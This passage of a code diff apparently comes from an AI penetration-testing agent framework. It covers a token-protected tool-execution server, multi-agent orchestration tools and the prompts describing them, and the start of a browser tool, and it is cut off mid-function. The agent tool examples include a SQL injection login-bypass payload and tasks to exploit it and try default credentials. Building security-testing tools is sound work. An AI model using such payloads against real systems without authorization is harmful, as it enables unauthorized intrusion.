status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication scheme. Bearer token required.",
headers={"WWW-Authenticate": "Bearer"},
)
if credentials.credentials != EXPECTED_TOKEN:
logger.warning("Authentication failed: Invalid token provided from remote host")
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication token",
headers={"WWW-Authenticate": "Bearer"},
)
logger.debug("Authentication successful for tool execution request")
return credentials.credentials
class ToolExecutionRequest(BaseModel):
tool_name: str
kwargs: dict[str, Any]
class ToolExecutionResponse(BaseModel):
result: Any | None = None
error: str | None = None
@app.post("/execute", response_model=ToolExecutionResponse)
async def execute_tool(
request: ToolExecutionRequest, credentials: HTTPAuthorizationCredentials = security_dependency
) -> ToolExecutionResponse:
verify_token(credentials)
from strix.tools.argument_parser import ArgumentConversionError, convert_arguments
from strix.tools.registry import get_tool_by_name
try:
tool_func = get_tool_by_name(request.tool_name)
if not tool_func:
return ToolExecutionResponse(error=f"Tool '{request.tool_name}' not found")
converted_kwargs = convert_arguments(tool_func, request.kwargs)
result = tool_func(**converted_kwargs)
return ToolExecutionResponse(result=result)
except (ArgumentConversionError, ValidationError) as e:
logger.warning("Invalid tool arguments: %s", e)
return ToolExecutionResponse(error=f"Invalid arguments: {e}")
except TypeError as e:
logger.warning("Tool execution type error: %s", e)
return ToolExecutionResponse(error=f"Tool execution error: {e}")
except ValueError as e:
logger.warning("Tool execution value error: %s", e)
return ToolExecutionResponse(error=f"Tool execution error: {e}")
except Exception:
logger.exception("Unexpected error during tool execution")
return ToolExecutionResponse(error="Internal server error")
@app.get("/health")
async def health_check() -> dict[str, str]:
return {
"status": "healthy",
"sandbox_mode": str(SANDBOX_MODE),
"environment": "sandbox" if SANDBOX_MODE else "main",
"auth_configured": "true" if EXPECTED_TOKEN else "false",
}

64
strix/tools/__init__.py Normal file
View File

@@ -0,0 +1,64 @@
import os
from .executor import (
execute_tool,
execute_tool_invocation,
execute_tool_with_validation,
extract_screenshot_from_result,
process_tool_invocations,
remove_screenshot_from_result,
validate_tool_availability,
)
from .registry import (
ImplementedInClientSideOnlyError,
get_tool_by_name,
get_tool_names,
get_tools_prompt,
needs_agent_state,
register_tool,
tools,
)
SANDBOX_MODE = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
HAS_PERPLEXITY_API = bool(os.getenv("PERPLEXITY_API_KEY"))
if not SANDBOX_MODE:
from .agents_graph import * # noqa: F403
from .browser import * # noqa: F403
from .file_edit import * # noqa: F403
from .finish import * # noqa: F403
from .notes import * # noqa: F403
from .proxy import * # noqa: F403
from .python import * # noqa: F403
from .reporting import * # noqa: F403
from .terminal import * # noqa: F403
from .thinking import * # noqa: F403
if HAS_PERPLEXITY_API:
from .web_search import * # noqa: F403
else:
from .browser import * # noqa: F403
from .file_edit import * # noqa: F403
from .notes import * # noqa: F403
from .proxy import * # noqa: F403
from .python import * # noqa: F403
from .terminal import * # noqa: F403
__all__ = [
"ImplementedInClientSideOnlyError",
"execute_tool",
"execute_tool_invocation",
"execute_tool_with_validation",
"extract_screenshot_from_result",
"get_tool_by_name",
"get_tool_names",
"get_tools_prompt",
"needs_agent_state",
"process_tool_invocations",
"register_tool",
"remove_screenshot_from_result",
"tools",
"validate_tool_availability",
]

View File

@@ -0,0 +1,16 @@
from .agents_graph_actions import (
agent_finish,
create_agent,
send_message_to_agent,
view_agent_graph,
wait_for_message,
)
__all__ = [
"agent_finish",
"create_agent",
"send_message_to_agent",
"view_agent_graph",
"wait_for_message",
]

View File

@@ -0,0 +1,610 @@
import threading
from datetime import UTC, datetime
from typing import Any, Literal
from strix.tools.registry import register_tool
_agent_graph: dict[str, Any] = {
"nodes": {},
"edges": [],
}
_root_agent_id: str | None = None
_agent_messages: dict[str, list[dict[str, Any]]] = {}
_running_agents: dict[str, threading.Thread] = {}
_agent_instances: dict[str, Any] = {}
_agent_states: dict[str, Any] = {}
def _run_agent_in_thread(
agent: Any, state: Any, inherited_messages: list[dict[str, Any]]
) -> dict[str, Any]:
try:
if inherited_messages:
state.add_message("user", "<inherited_context_from_parent>")
for msg in inherited_messages:
state.add_message(msg["role"], msg["content"])
state.add_message("user", "</inherited_context_from_parent>")
parent_info = _agent_graph["nodes"].get(state.parent_id, {})
parent_name = parent_info.get("name", "Unknown Parent")
context_status = (
"inherited conversation context from your parent for background understanding"
if inherited_messages
else "started with a fresh context"
)
task_xml = f"""<agent_delegation>
<identity>
⚠️ You are NOT your parent agent. You are a NEW, SEPARATE sub-agent (not root).
Your Info: {state.agent_name} ({state.agent_id})
Parent Info: {parent_name} ({state.parent_id})
</identity>
<your_task>{state.task}</your_task>
<instructions>
- You have {context_status}
- Inherited context is for BACKGROUND ONLY - don't continue parent's work
- Focus EXCLUSIVELY on your delegated task above
- Work independently with your own approach
- Use agent_finish when complete to report back to parent
- You are a SPECIALIST for this specific task
</instructions>
</agent_delegation>"""
state.add_message("user", task_xml)
_agent_states[state.agent_id] = state
_agent_graph["nodes"][state.agent_id]["state"] = state.model_dump()
import asyncio
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
result = loop.run_until_complete(agent.agent_loop(state.task))
finally:
loop.close()
except Exception as e:
_agent_graph["nodes"][state.agent_id]["status"] = "error"
_agent_graph["nodes"][state.agent_id]["finished_at"] = datetime.now(UTC).isoformat()
_agent_graph["nodes"][state.agent_id]["result"] = {"error": str(e)}
_running_agents.pop(state.agent_id, None)
_agent_instances.pop(state.agent_id, None)
raise
else:
if state.stop_requested:
_agent_graph["nodes"][state.agent_id]["status"] = "stopped"
else:
_agent_graph["nodes"][state.agent_id]["status"] = "completed"
_agent_graph["nodes"][state.agent_id]["finished_at"] = datetime.now(UTC).isoformat()
_agent_graph["nodes"][state.agent_id]["result"] = result
_running_agents.pop(state.agent_id, None)
_agent_instances.pop(state.agent_id, None)
return {"result": result}
@register_tool(sandbox_execution=False)
def view_agent_graph(agent_state: Any) -> dict[str, Any]:
try:
structure_lines = ["=== AGENT GRAPH STRUCTURE ==="]
def _build_tree(agent_id: str, depth: int = 0) -> None:
node = _agent_graph["nodes"][agent_id]
indent = " " * depth
you_indicator = " ← This is you" if agent_id == agent_state.agent_id else ""
structure_lines.append(f"{indent}* {node['name']} ({agent_id}){you_indicator}")
structure_lines.append(f"{indent} Task: {node['task']}")
structure_lines.append(f"{indent} Status: {node['status']}")
children = [
edge["to"]
for edge in _agent_graph["edges"]
if edge["from"] == agent_id and edge["type"] == "delegation"
]
if children:
structure_lines.append(f"{indent} Children:")
for child_id in children:
_build_tree(child_id, depth + 2)
root_agent_id = _root_agent_id
if not root_agent_id and _agent_graph["nodes"]:
for agent_id, node in _agent_graph["nodes"].items():
if node.get("parent_id") is None:
root_agent_id = agent_id
break
if not root_agent_id:
root_agent_id = next(iter(_agent_graph["nodes"].keys()))
if root_agent_id and root_agent_id in _agent_graph["nodes"]:
_build_tree(root_agent_id)
else:
structure_lines.append("No agents in the graph yet")
graph_structure = "\n".join(structure_lines)
total_nodes = len(_agent_graph["nodes"])
running_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "running"
)
waiting_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "waiting"
)
stopping_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "stopping"
)
completed_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "completed"
)
stopped_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "stopped"
)
failed_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] in ["failed", "error"]
)
except Exception as e: # noqa: BLE001
return {
"error": f"Failed to view agent graph: {e}",
"graph_structure": "Error retrieving graph structure",
}
else:
return {
"graph_structure": graph_structure,
"summary": {
"total_agents": total_nodes,
"running": running_count,
"waiting": waiting_count,
"stopping": stopping_count,
"completed": completed_count,
"stopped": stopped_count,
"failed": failed_count,
},
}
@register_tool(sandbox_execution=False)
def create_agent(
agent_state: Any,
task: str,
name: str,
inherit_context: bool = True,
prompt_modules: str | None = None,
) -> dict[str, Any]:
try:
parent_id = agent_state.agent_id
module_list = []
if prompt_modules:
module_list = [m.strip() for m in prompt_modules.split(",") if m.strip()]
if "root_agent" in module_list:
return {
"success": False,
"error": (
"The 'root_agent' module is reserved for the main agent "
"and cannot be used by sub-agents"
),
"agent_id": None,
}
if len(module_list) > 3:
return {
"success": False,
"error": (
"Cannot specify more than 3 prompt modules for an agent "
"(use comma-separated format)"
),
"agent_id": None,
}
if module_list:
from strix.prompts import get_all_module_names, validate_module_names
validation = validate_module_names(module_list)
if validation["invalid"]:
available_modules = list(get_all_module_names())
return {
"success": False,
"error": (
f"Invalid prompt modules: {validation['invalid']}. "
f"Available modules: {', '.join(available_modules)}"
),
"agent_id": None,
}
from strix.agents import StrixAgent
from strix.agents.state import AgentState
from strix.llm.config import LLMConfig
state = AgentState(task=task, agent_name=name, parent_id=parent_id, max_iterations=200)
llm_config = LLMConfig(prompt_modules=module_list)
agent = StrixAgent(
{
"llm_config": llm_config,
"state": state,
}
)
inherited_messages = []
if inherit_context:
inherited_messages = agent_state.get_conversation_history()
_agent_instances[state.agent_id] = agent
thread = threading.Thread(
target=_run_agent_in_thread,
args=(agent, state, inherited_messages),
daemon=True,
name=f"Agent-{name}-{state.agent_id}",
)
thread.start()
_running_agents[state.agent_id] = thread
except Exception as e: # noqa: BLE001
return {"success": False, "error": f"Failed to create agent: {e}", "agent_id": None}
else:
return {
"success": True,
"agent_id": state.agent_id,
"message": f"Agent '{name}' created and started asynchronously",
"agent_info": {
"id": state.agent_id,
"name": name,
"status": "running",
"parent_id": parent_id,
},
}
@register_tool(sandbox_execution=False)
def send_message_to_agent(
agent_state: Any,
target_agent_id: str,
message: str,
message_type: Literal["query", "instruction", "information"] = "information",
priority: Literal["low", "normal", "high", "urgent"] = "normal",
) -> dict[str, Any]:
try:
if target_agent_id not in _agent_graph["nodes"]:
return {
"success": False,
"error": f"Target agent '{target_agent_id}' not found in graph",
"message_id": None,
}
sender_id = agent_state.agent_id
from uuid import uuid4
message_id = f"msg_{uuid4().hex[:8]}"
message_data = {
"id": message_id,
"from": sender_id,
"to": target_agent_id,
"content": message,
"message_type": message_type,
"priority": priority,
"timestamp": datetime.now(UTC).isoformat(),
"delivered": False,
"read": False,
}
if target_agent_id not in _agent_messages:
_agent_messages[target_agent_id] = []
_agent_messages[target_agent_id].append(message_data)
_agent_graph["edges"].append(
{
"from": sender_id,
"to": target_agent_id,
"type": "message",
"message_id": message_id,
"message_type": message_type,
"priority": priority,
"created_at": datetime.now(UTC).isoformat(),
}
)
message_data["delivered"] = True
target_name = _agent_graph["nodes"][target_agent_id]["name"]
sender_name = _agent_graph["nodes"][sender_id]["name"]
return {
"success": True,
"message_id": message_id,
"message": f"Message sent from '{sender_name}' to '{target_name}'",
"delivery_status": "delivered",
"target_agent": {
"id": target_agent_id,
"name": target_name,
"status": _agent_graph["nodes"][target_agent_id]["status"],
},
}
except Exception as e: # noqa: BLE001
return {"success": False, "error": f"Failed to send message: {e}", "message_id": None}
@register_tool(sandbox_execution=False)
def agent_finish(
agent_state: Any,
result_summary: str,
findings: list[str] | None = None,
success: bool = True,
report_to_parent: bool = True,
final_recommendations: list[str] | None = None,
) -> dict[str, Any]:
try:
if not hasattr(agent_state, "parent_id") or agent_state.parent_id is None:
return {
"agent_completed": False,
"error": (
"This tool can only be used by subagents. "
"Root/main agents must use finish_scan instead."
),
"parent_notified": False,
}
agent_id = agent_state.agent_id
if agent_id not in _agent_graph["nodes"]:
return {"agent_completed": False, "error": "Current agent not found in graph"}
agent_node = _agent_graph["nodes"][agent_id]
agent_node["status"] = "finished" if success else "failed"
agent_node["finished_at"] = datetime.now(UTC).isoformat()
agent_node["result"] = {
"summary": result_summary,
"findings": findings or [],
"success": success,
"recommendations": final_recommendations or [],
}
parent_notified = False
if report_to_parent and agent_node["parent_id"]:
parent_id = agent_node["parent_id"]
if parent_id in _agent_graph["nodes"]:
findings_xml = "\n".join(
f" <finding>{finding}</finding>" for finding in (findings or [])
)
recommendations_xml = "\n".join(
f" <recommendation>{rec}</recommendation>"
for rec in (final_recommendations or [])
)
report_message = f"""<agent_completion_report>
<agent_info>
<agent_name>{agent_node["name"]}</agent_name>
<agent_id>{agent_id}</agent_id>
<task>{agent_node["task"]}</task>
<status>{"SUCCESS" if success else "FAILED"}</status>
<completion_time>{agent_node["finished_at"]}</completion_time>
</agent_info>
<results>
<summary>{result_summary}</summary>
<findings>
{findings_xml}
</findings>
<recommendations>
{recommendations_xml}
</recommendations>
</results>
</agent_completion_report>"""
if parent_id not in _agent_messages:
_agent_messages[parent_id] = []
from uuid import uuid4
_agent_messages[parent_id].append(
{
"id": f"report_{uuid4().hex[:8]}",
"from": agent_id,
"to": parent_id,
"content": report_message,
"message_type": "information",
"priority": "high",
"timestamp": datetime.now(UTC).isoformat(),
"delivered": True,
"read": False,
}
)
parent_notified = True
_running_agents.pop(agent_id, None)
return {
"agent_completed": True,
"parent_notified": parent_notified,
"completion_summary": {
"agent_id": agent_id,
"agent_name": agent_node["name"],
"task": agent_node["task"],
"success": success,
"findings_count": len(findings or []),
"has_recommendations": bool(final_recommendations),
"finished_at": agent_node["finished_at"],
},
}
except Exception as e: # noqa: BLE001
return {
"agent_completed": False,
"error": f"Failed to complete agent: {e}",
"parent_notified": False,
}
def stop_agent(agent_id: str) -> dict[str, Any]:
try:
if agent_id not in _agent_graph["nodes"]:
return {
"success": False,
"error": f"Agent '{agent_id}' not found in graph",
"agent_id": agent_id,
}
agent_node = _agent_graph["nodes"][agent_id]
if agent_node["status"] in ["completed", "error", "failed", "stopped"]:
return {
"success": True,
"message": f"Agent '{agent_node['name']}' was already stopped",
"agent_id": agent_id,
"previous_status": agent_node["status"],
}
if agent_id in _agent_states:
agent_state = _agent_states[agent_id]
agent_state.request_stop()
if agent_id in _agent_instances:
agent_instance = _agent_instances[agent_id]
if hasattr(agent_instance, "state"):
agent_instance.state.request_stop()
if hasattr(agent_instance, "cancel_current_execution"):
agent_instance.cancel_current_execution()
agent_node["status"] = "stopping"
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.update_agent_status(agent_id, "stopping")
except (ImportError, AttributeError):
pass
agent_node["result"] = {
"summary": "Agent stop requested by user",
"success": False,
"stopped_by_user": True,
}
return {
"success": True,
"message": f"Stop request sent to agent '{agent_node['name']}'",
"agent_id": agent_id,
"agent_name": agent_node["name"],
"note": "Agent will stop gracefully after current iteration",
}
except Exception as e: # noqa: BLE001
return {
"success": False,
"error": f"Failed to stop agent: {e}",
"agent_id": agent_id,
}
def send_user_message_to_agent(agent_id: str, message: str) -> dict[str, Any]:
try:
if agent_id not in _agent_graph["nodes"]:
return {
"success": False,
"error": f"Agent '{agent_id}' not found in graph",
"agent_id": agent_id,
}
agent_node = _agent_graph["nodes"][agent_id]
if agent_id not in _agent_messages:
_agent_messages[agent_id] = []
from uuid import uuid4
message_data = {
"id": f"user_msg_{uuid4().hex[:8]}",
"from": "user",
"to": agent_id,
"content": message,
"message_type": "instruction",
"priority": "high",
"timestamp": datetime.now(UTC).isoformat(),
"delivered": True,
"read": False,
}
_agent_messages[agent_id].append(message_data)
return {
"success": True,
"message": f"Message sent to agent '{agent_node['name']}'",
"agent_id": agent_id,
"agent_name": agent_node["name"],
}
except Exception as e: # noqa: BLE001
return {
"success": False,
"error": f"Failed to send message to agent: {e}",
"agent_id": agent_id,
}
@register_tool(sandbox_execution=False)
def wait_for_message(
agent_state: Any,
reason: str = "Waiting for messages from other agents or user input",
) -> dict[str, Any]:
try:
agent_id = agent_state.agent_id
agent_name = agent_state.agent_name
agent_state.enter_waiting_state()
if agent_id in _agent_graph["nodes"]:
_agent_graph["nodes"][agent_id]["status"] = "waiting"
_agent_graph["nodes"][agent_id]["waiting_reason"] = reason
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.update_agent_status(agent_id, "waiting")
except (ImportError, AttributeError):
pass
except Exception as e: # noqa: BLE001
return {"success": False, "error": f"Failed to enter waiting state: {e}", "status": "error"}
else:
return {
"success": True,
"status": "waiting",
"message": f"Agent '{agent_name}' is now waiting for messages",
"reason": reason,
"agent_info": {
"id": agent_id,
"name": agent_name,
"status": "waiting",
},
"resume_conditions": [
"Message from another agent",
"Message from user",
"Direct communication",
],
}

View File

@@ -0,0 +1,223 @@
<tools>
<tool name="agent_finish">
<description>Mark a subagent's task as completed and optionally report results to parent agent.
IMPORTANT: This tool can ONLY be used by subagents (agents with a parent).
Root/main agents must use finish_scan instead.
This tool should be called when a subagent completes its assigned subtask to:
- Mark the subagent's task as completed
- Report findings back to the parent agent
Use this tool when:
- You are a subagent working on a specific subtask
- You have completed your assigned task
- You want to report your findings to the parent agent
- You are ready to terminate this subagent's execution</description>
<details>This replaces the previous finish_scan tool and handles both sub-agent completion
and main agent completion. When a sub-agent finishes, it can report its findings
back to the parent agent for coordination.</details>
<parameters>
<parameter name="result_summary" type="string" required="true">
<description>Summary of what the agent accomplished and discovered</description>
</parameter>
<parameter name="findings" type="string" required="false">
<description>List of specific findings, vulnerabilities, or discoveries</description>
</parameter>
<parameter name="success" type="boolean" required="false">
<description>Whether the agent's task completed successfully</description>
</parameter>
<parameter name="report_to_parent" type="boolean" required="false">
<description>Whether to send results back to the parent agent</description>
</parameter>
<parameter name="final_recommendations" type="string" required="false">
<description>Recommendations for next steps or follow-up actions</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - agent_completed: Whether the agent was marked as completed - parent_notified: Whether parent was notified (if applicable) - completion_summary: Summary of completion status</description>
</returns>
<examples>
# Sub-agent completing subdomain enumeration task
<function=agent_finish>
<parameter=result_summary>Completed comprehensive subdomain enumeration for target.com.
Discovered 47 subdomains including several interesting ones with admin/dev
in the name. Found 3 subdomains with exposed services on non-standard
ports.</parameter>
<parameter=findings>["admin.target.com - exposed phpMyAdmin",
"dev-api.target.com - unauth API endpoints",
"staging.target.com - directory listing enabled",
"mail.target.com - POP3/IMAP services"]</parameter>
<parameter=success>true</parameter>
<parameter=report_to_parent>true</parameter>
<parameter=final_recommendations>["Prioritize testing admin.target.com for default creds",
"Enumerate dev-api.target.com API endpoints",
"Check staging.target.com for sensitive files"]</parameter>
</function>
</examples>
</tool>
<tool name="create_agent">
<description>Create and spawn a new agent to handle a specific subtask.
MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any new agent to check if there is already an agent working on the same or similar task. Only create a new agent if no existing agent is handling the specific task.</description>
<details>The new agent inherits the parent's conversation history and context up to the point
of creation, then continues with its assigned subtask. This enables decomposition
of complex penetration testing tasks into specialized sub-agents.
The agent runs asynchronously and independently, allowing the parent to continue
immediately while the new agent executes its task in the background.
CRITICAL: Before calling this tool, you MUST first use view_agent_graph to:
- Examine all existing agents and their current tasks
- Verify no agent is already working on the same or similar objective
- Avoid duplication of effort and resource waste
- Ensure efficient coordination across the multi-agent system
If you as a parent agent don't absolutely have anything to do while your subagents are running, you can use wait_for_message tool. The subagent will continue to run in the background, and update you when it's done.
</details>
<parameters>
<parameter name="task" type="string" required="true">
<description>The specific task/objective for the new agent to accomplish</description>
</parameter>
<parameter name="name" type="string" required="true">
<description>Human-readable name for the agent (for tracking purposes)</description>
</parameter>
<parameter name="inherit_context" type="boolean" required="false">
<description>Whether the new agent should inherit parent's conversation history and context</description>
</parameter>
<parameter name="prompt_modules" type="string" required="false">
<description>Comma-separated list of prompt modules to use for the agent. Most agents should have at least one module in order to be useful. {{DYNAMIC_MODULES_DESCRIPTION}}</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - agent_id: Unique identifier for the created agent - success: Whether the agent was created successfully - message: Status message - agent_info: Details about the created agent</description>
</returns>
<examples>
# REQUIRED: First check agent graph before creating any new agent
<function=view_agent_graph>
</function>
# REQUIRED: Check agent graph again before creating another agent
<function=view_agent_graph>
</function>
# After confirming no SQL testing agent exists, create agent for vulnerability validation
<function=create_agent>
<parameter=task>Validate and exploit the suspected SQL injection vulnerability found in
the login form. Confirm exploitability and document proof of concept.</parameter>
<parameter=name>SQLi Validator</parameter>
<parameter=prompt_modules>sql_injection</parameter>
</function>
# Create specialized authentication testing agent with multiple modules (comma-separated)
<function=create_agent>
<parameter=task>Test authentication mechanisms, JWT implementation, and session management
for security vulnerabilities and bypass techniques.</parameter>
<parameter=name>Auth Specialist</parameter>
<parameter=prompt_modules>authentication_jwt, business_logic</parameter>
</function>
</examples>
</tool>
<tool name="send_message_to_agent">
<description>Send a message to another agent in the graph for coordination and communication.</description>
<details>This enables agents to communicate with each other during execution for:
- Sharing discovered information or findings
- Asking questions or requesting assistance
- Providing instructions or coordination
- Reporting status or results</details>
<parameters>
<parameter name="target_agent_id" type="string" required="true">
<description>ID of the agent to send the message to</description>
</parameter>
<parameter name="message" type="string" required="true">
<description>The message content to send</description>
</parameter>
<parameter name="message_type" type="string" required="false">
<description>Type of message being sent: - "query": Question requiring a response - "instruction": Command or directive for the target agent - "information": Informational message (findings, status, etc.)</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>Priority level of the message</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - success: Whether the message was sent successfully - message_id: Unique identifier for the message - delivery_status: Status of message delivery</description>
</returns>
<examples>
# Share discovered vulnerability information
<function=send_message_to_agent>
<parameter=target_agent_id>agent_abc123</parameter>
<parameter=message>Found SQL injection vulnerability in /login.php parameter 'username'.
Payload: admin' OR '1'='1' -- successfully bypassed authentication.
You should focus your testing on the authenticated areas of the
application.</parameter>
<parameter=message_type>information</parameter>
<parameter=priority>high</parameter>
</function>
# Request assistance from specialist agent
<function=send_message_to_agent>
<parameter=target_agent_id>agent_def456</parameter>
<parameter=message>I've identified what appears to be a custom encryption implementation
in the API responses. Can you analyze the cryptographic strength and look
for potential weaknesses?</parameter>
<parameter=message_type>query</parameter>
<parameter=priority>normal</parameter>
</function>
</examples>
</tool>
<tool name="view_agent_graph">
<description>View the current agent graph showing all agents, their relationships, and status.</description>
<details>This provides a comprehensive overview of the multi-agent system including:
- All agent nodes with their tasks, status, and metadata
- Parent-child relationships between agents
- Message communication patterns
- Current execution state</details>
<returns type="Dict[str, Any]">
<description>Response containing: - graph_structure: Human-readable representation of the agent graph - summary: High-level statistics about the graph</description>
</returns>
</tool>
<tool name="wait_for_message">
<description>Pause the agent loop indefinitely until receiving a message from another agent or user.
This tool puts the agent into a waiting state where it remains idle until it receives any form of communication. The agent will automatically resume execution when a message arrives.
IMPORTANT: This tool causes the agent to stop all activity until a message is received. Use it when you need to:
- Wait for subagent completion reports
- Coordinate with other agents before proceeding
- Pause for user input or decisions
- Synchronize multi-agent workflows
NOTE: If you are waiting for an agent that is NOT your subagent, you first tell it to message you with updates before waiting for it. Otherwise, you will wait forever!
</description>
<details>When this tool is called, the agent enters a waiting state and will not continue execution until:
- Another agent sends it a message via send_message_to_agent
- A user sends it a direct message through the CLI
- Any other form of inter-agent or user communication occurs
The agent will automatically resume from where it left off once a message is received.
This is particularly useful for parent agents waiting for subagent results or for coordination points in multi-agent workflows.</details>
<parameters>
<parameter name="reason" type="string" required="false">
<description>Explanation for why the agent is waiting (for logging and monitoring purposes)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - success: Whether the agent successfully entered waiting state - status: Current agent status ("waiting") - reason: The reason for waiting - agent_info: Details about the waiting agent - resume_conditions: List of conditions that will resume the agent</description>
</returns>
<examples>
# Wait for subagents to complete their tasks
<function=wait_for_message>
<parameter=reason>Waiting for subdomain enumeration and port scanning subagents to complete their tasks and report findings</parameter>
</function>
# Wait for user input on next steps
<function=wait_for_message>
<parameter=reason>Waiting for user decision on whether to proceed with exploitation of discovered SQL injection vulnerability</parameter>
</function>
# Coordinate with other agents
<function=wait_for_message>
<parameter=reason>Waiting for vulnerability assessment agent to share discovered attack vectors before proceeding with exploitation phase</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,120 @@
import contextlib
import inspect
import json
from collections.abc import Callable
from typing import Any, Union, get_args, get_origin
class ArgumentConversionError(Exception):
def __init__(self, message: str, param_name: str | None = None) -> None:
self.param_name = param_name
super().__init__(message)
def convert_arguments(func: Callable[..., Any], kwargs: dict[str, Any]) -> dict[str, Any]:
try:
sig = inspect.signature(func)
converted = {}
for param_name, value in kwargs.items():
if param_name not in sig.parameters:
converted[param_name] = value
continue
param = sig.parameters[param_name]
param_type = param.annotation
if param_type == inspect.Parameter.empty or value is None:
converted[param_name] = value
continue
if not isinstance(value, str):
converted[param_name] = value
continue
try:
converted[param_name] = convert_string_to_type(value, param_type)
except (ValueError, TypeError, json.JSONDecodeError) as e:
raise ArgumentConversionError(
f"Failed to convert argument '{param_name}' to type {param_type}: {e}",
param_name=param_name,
) from e
except (ValueError, TypeError, AttributeError) as e:
raise ArgumentConversionError(f"Failed to process function arguments: {e}") from e
return converted
def convert_string_to_type(value: str, param_type: Any) -> Any:
origin = get_origin(param_type)
if origin is Union or origin is type(str | None):
args = get_args(param_type)
for arg_type in args:
if arg_type is not type(None):
with contextlib.suppress(ValueError, TypeError, json.JSONDecodeError):
return convert_string_to_type(value, arg_type)
return value
if hasattr(param_type, "__args__"):
args = getattr(param_type, "__args__", ())
if len(args) == 2 and type(None) in args:
non_none_type = args[0] if args[1] is type(None) else args[1]
with contextlib.suppress(ValueError, TypeError, json.JSONDecodeError):
return convert_string_to_type(value, non_none_type)
return value
return _convert_basic_types(value, param_type, origin)
def _convert_basic_types(value: str, param_type: Any, origin: Any = None) -> Any:
basic_type_converters: dict[Any, Callable[[str], Any]] = {
int: int,
float: float,
bool: _convert_to_bool,
str: str,
}
if param_type in basic_type_converters:
return basic_type_converters[param_type](value)
if list in (origin, param_type):
return _convert_to_list(value)
if dict in (origin, param_type):
return _convert_to_dict(value)
with contextlib.suppress(json.JSONDecodeError):
return json.loads(value)
return value
def _convert_to_bool(value: str) -> bool:
if value.lower() in ("true", "1", "yes", "on"):
return True
if value.lower() in ("false", "0", "no", "off"):
return False
return bool(value)
def _convert_to_list(value: str) -> list[Any]:
try:
parsed = json.loads(value)
if isinstance(parsed, list):
return parsed
except json.JSONDecodeError:
if "," in value:
return [item.strip() for item in value.split(",")]
return [value]
else:
return [parsed]
def _convert_to_dict(value: str) -> dict[str, Any]:
try:
parsed = json.loads(value)
if isinstance(parsed, dict):
return parsed
except json.JSONDecodeError:
return {}
else:
return {}

View File

@@ -0,0 +1,4 @@
from .browser_actions import browser_action
__all__ = ["browser_action"]

View File

@@ -0,0 +1,236 @@
from typing import Any, Literal, NoReturn
from strix.tools.registry import register_tool
from .tab_manager import BrowserTabManager, get_browser_tab_manager
BrowserAction = Literal[
"launch",
"goto",
"click",
"type",
"scroll_down",
"scroll_up",
"back",
"forward",
"new_tab",
"switch_tab",
"close_tab",
"wait",
"execute_js",
"double_click",
"hover",
"press_key",
"save_pdf",
"get_console_logs",
"view_source",
"close",
"list_tabs",
]
def _validate_url(action_name: str, url: str | None) -> None:
if not url:
raise ValueError(f"url parameter is required for {action_name} action")
def _validate_coordinate(action_name: str, coordinate: str | None) -> None:
if not coordinate:
raise ValueError(f"coordinate parameter is required for {action_name} action")
def _validate_text(action_name: str, text: str | None) -> None:
if not text:
raise ValueError(f"text parameter is required for {action_name} action")
def _validate_tab_id(action_name: str, tab_id: str | None) -> None:
if not tab_id:
raise ValueError(f"tab_id parameter is required for {action_name} action")
def _validate_js_code(action_name: str, js_code: str | None) -> None:
if not js_code:
raise ValueError(f"js_code parameter is required for {action_name} action")
def _validate_duration(action_name: str, duration: float | None) -> None:
if duration is None:
raise ValueError(f"duration parameter is required for {action_name} action")
def _validate_key(action_name: str, key: str | None) -> None:
if not key:
raise ValueError(f"key parameter is required for {action_name} action")
def _validate_file_path(action_name: str, file_path: str | None) -> None:
if not file_path:
raise ValueError(f"file_path parameter is required for {action_name} action")
def _handle_navigation_actions(
manager: BrowserTabManager,
action: str,
url: str | None = None,
tab_id: str | None = None,
) -> dict[str, Any]:
if action == "launch":
return manager.launch_browser(url)
if action == "goto":
_validate_url(action, url)
assert url is not None
return manager.goto_url(url, tab_id)
if action == "back":
return manager.back(tab_id)
if action == "forward":
return manager.forward(tab_id)
raise ValueError(f"Unknown navigation action: {action}")
def _handle_interaction_actions(
manager: BrowserTabManager,
action: str,
coordinate: str | None = None,
text: str | None = None,
key: str | None = None,
tab_id: str | None = None,
) -> dict[str, Any]:
if action in {"click", "double_click", "hover"}:
_validate_coordinate(action, coordinate)
assert coordinate is not None
action_map = {
"click": manager.click,
"double_click": manager.double_click,
"hover": manager.hover,
}
return action_map[action](coordinate, tab_id)
if action in {"scroll_down", "scroll_up"}:
direction = "down" if action == "scroll_down" else "up"
return manager.scroll(direction, tab_id)
if action == "type":
_validate_text(action, text)
assert text is not None
return manager.type_text(text, tab_id)
if action == "press_key":
_validate_key(action, key)
assert key is not None
return manager.press_key(key, tab_id)
raise ValueError(f"Unknown interaction action: {action}")
def _raise_unknown_action(action: str) -> NoReturn:
raise ValueError(f"Unknown action: {action}")
def _handle_tab_actions(
manager: BrowserTabManager,
action: str,
url: str | None = None,
tab_id: str | None = None,
) -> dict[str, Any]:
if action == "new_tab":
return manager.new_tab(url)
if action == "switch_tab":
_validate_tab_id(action, tab_id)
assert tab_id is not None
return manager.switch_tab(tab_id)
if action == "close_tab":
_validate_tab_id(action, tab_id)
assert tab_id is not None
return manager.close_tab(tab_id)
if action == "list_tabs":
return manager.list_tabs()
raise ValueError(f"Unknown tab action: {action}")
def _handle_utility_actions(
manager: BrowserTabManager,
action: str,
duration: float | None = None,
js_code: str | None = None,
file_path: str | None = None,
